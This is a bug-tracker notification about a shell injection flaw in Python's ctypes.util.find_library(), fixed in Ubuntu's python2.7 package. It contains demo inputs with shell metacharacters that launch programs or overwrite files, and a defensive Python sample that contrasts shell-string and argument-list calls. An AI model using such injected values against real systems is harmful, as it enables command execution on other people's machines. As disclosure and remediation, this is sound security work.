group.of.nepali.translators team mailing list archive
Message #20899
[Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()
This bug was fixed in the package python2.7 - 2.7.12-1ubuntu0~16.04.3
---------------
python2.7 (2.7.12-1ubuntu0~16.04.3) xenial-proposed; urgency=medium

  * Some performance improvements: LP: #1638695.
    - Build the _math.o object file without -fPIC for static builds.
  * Rename md5_* functions to _Py_md5_*. Closes: #868366. LP: #1734109.
  * Explicitly use the system python for byte compilation in postinst scripts.
    LP: #1682934.
  * Fix issue #22636: Avoid shell injection problems with
    ctypes.util.find_library(). LP: #1512068.

 -- Matthias Klose <doko@xxxxxxxxxx>  Mon, 04 Dec 2017 15:50:18 +0100
** Changed in: python2.7 (Ubuntu Xenial)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1512068
Title:
Python ctypes.util , Shell Injection in find_library()
Status in Python:
Fix Released
Status in python2.7 package in Ubuntu:
Fix Released
Status in python2.7 source package in Xenial:
Fix Released
Bug description:
https://github.com/Legrandin/ctypes/issues/1
The find_library() function can execute code when special chars like ;|`<>$ are in the name.
The "os.popen()" calls in the util.py script should be replaced with "subprocess.Popen()".
Demo Exploits for Linux :
====================
>>> from ctypes.util import find_library
>>> find_library(";xeyes") # runs xeyes
>>> find_library("|xterm") # runs terminal
>>> find_library("&gimp") # runs gimp
>>> find_library("$(nautilus)") # runs filemanager
>>> find_library(">test") # creates, and if exists, erases a file "test"
==== Traceback ====
>>> find_library("`xmessage hello`") # shows a message, press ctrl+c for Traceback
^CTraceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
    return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
  File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
    trace = f.read()
KeyboardInterrupt
ProblemType: Bug
DistroRelease: Ubuntu 15.10
Package: libpython2.7-stdlib 2.7.10-4ubuntu1
ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
Uname: Linux 4.2.0-16-generic x86_64
ApportVersion: 2.19.1-0ubuntu4
Architecture: amd64
CurrentDesktop: XFCE
Date: Sun Nov 1 10:34:38 2015
InstallationDate: Installed on 2015-10-09 (22 days ago)
InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
SourcePackage: python2.7
UpgradeStatus: No upgrade log present (probably fresh install)
To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions
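
The difference between an os.popen()-style shell string and an argument list, as an added example that is not part of the bug report or of the Python patch. Here echo stands in for the external tool that find_library() invokes (assumes a POSIX system); SAMPLE, the function names and the SAFE_NAME allow-list are assumptions made for illustration.

```python
import re
import subprocess
from ctypes.util import find_library

# Constructed input: a "library name" carrying a shell metacharacter and a
# harmless marker command.
SAMPLE = "m;echo INJECTED"

# Assumed allow-list for library names (covers e.g. "m", "ssl", "stdc++").
SAFE_NAME = re.compile(r"[A-Za-z0-9_.+-]+")


def probe_shell_string(name):
    """Pre-fix pattern: the name is pasted into a string that /bin/sh parses."""
    cmd = "echo lib%s" % name
    out = subprocess.check_output(cmd, shell=True)
    return out.decode().splitlines()


def probe_argv(name):
    """Hardened pattern: argument list, no shell; the name stays one argument."""
    out = subprocess.check_output(["echo", "lib" + name])
    return out.decode().splitlines()


def find_library_checked(name):
    """Caller-side guard for interpreters that may lack the fix."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("implausible library name: %r" % name)
    return find_library(name)


if __name__ == "__main__":
    print(probe_shell_string(SAMPLE))  # the shell ran two commands
    print(probe_argv(SAMPLE))          # one literal argument, nothing else ran
    try:
        find_library_checked(SAMPLE)
    except ValueError as exc:
        print("rejected:", exc)
```

The allow-list wrapper is defence in depth for code that passes externally supplied names to find_library(); it does not replace installing the fixed package.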